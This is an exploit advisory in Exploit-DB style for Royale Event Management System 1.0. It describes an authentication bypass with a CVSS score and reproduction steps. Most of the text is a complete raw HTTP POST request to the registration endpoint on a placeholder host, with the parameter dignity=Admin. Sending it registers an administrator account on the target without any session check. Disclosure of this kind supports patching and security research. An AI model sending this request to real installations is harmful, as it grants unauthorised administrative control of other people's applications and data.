# Exploit Title: Royale Event Management System 1.0 - Authentication Bypass # Date: 25/03/2022 # Exploit Author: Mr Empy # Software Link: https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html # Version: 1.0 # Tested on: Linux Title: ================ Royale Event Management System 1.0 - Authentication Bypass Summary: ================ Royale Event Management System version 1.0 is affected by a vulnerability that allows an attacker to bypass authentication. Because of the lack of session validation, the attacker could register a user with administrative permissions over the application and gain full access to it. Severity Level: ================ 7.3 (High) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L Affected Product: ================ Royale Event Management System v1.0 Steps to Reproduce: ================ 1. Open a request repeater (like Burp Suite) and send this request: POST /royal_event/userregister.php HTTP/1.1 Host: target.com Content-Length: 164 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://target.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://target.com/one_church/userregister.php Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close dignity=Admin&staffid=1000&fullname=&firstname=&lastname=&mobileno=2520000000&emailid=&password=&confirmpassword=&signup=Register Fill in the parameters with the values according to each one of them and send the request.